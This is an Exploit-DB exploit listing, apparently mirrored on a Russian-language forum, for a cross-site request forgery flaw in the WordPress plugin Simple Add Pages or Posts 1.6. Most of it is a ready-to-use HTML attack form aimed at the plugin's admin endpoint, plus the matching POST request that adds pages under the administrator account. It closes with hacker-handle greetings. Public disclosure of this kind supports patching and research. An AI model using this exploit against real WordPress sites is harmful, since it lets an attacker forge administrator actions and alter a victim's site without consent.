- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39384
- Проверка EDB
-
- Пройдено
- Автор
- ALIREZA_PROMIS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2016-01-29
WordPress Plugin Simple Add Pages or Posts 1.6 - Cross-Site Request Forgery
Код:
########################################################################
# Exploit Title: Wordpress simple add pages or posts CSRF Vulnerability
# Date: 2016/29/01
# Exploit Author: ALIREZA_PROMIS
# Vendor Homepage: https://wordpress.org/plugins/simple-add-pages-or-posts/
# Software Link: https://downloads.wordpress.org/plugin/simple-add-pages-or-posts.1.6.zip
# Version: 1.6
# Tested on: ubuntu / FireFox
########################################################################
[Exploitation]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
[HTML CODE ]
<form id="form1" name="form1" method="post" action="http://site.com/wp-admin/plugins.php?page=simple-add-pages-or-posts%2Fsimple_add_pages_or_posts.php"
<select name="postorpage">
<option value="page">Page</option>
<option value="post">Post</option>
</select>
<td colspan="2"><select name='post_parent' id='post_parent'>
<option value="">No, do not use parent</option>
<option class="level-0" value="2">Sample Page</option>
</select>
<tr class="alternate iedit">
<textarea name="titles" rows="1" cols="30"></textarea>
<tr class="iedit">
<td colspan="2"><select name="author_id">
<option value="1">admin</option></select>
<input type="submit" name="submitbutton" value="Add" class="button-primary"></form>
and live POST request :
postorpage=page&post_parent=2&titles=TEST_CSRF&author_id=1&submitbutton=Add
########################################################################
# Friends : ali ahmady , Mr.Moein , sheytan azzam , Mr.PERSIA , H3llBoy.Blackhat , Amir , Jok3r
# Sajjad Sotoudeh , security , Kamran Helish , Dr.RooT , Milad Inj3ctor , Mr.Turk
#
# [+] fb.com/alirezapomis.blackhat
########################################################################
- Источник
- www.exploit-db.com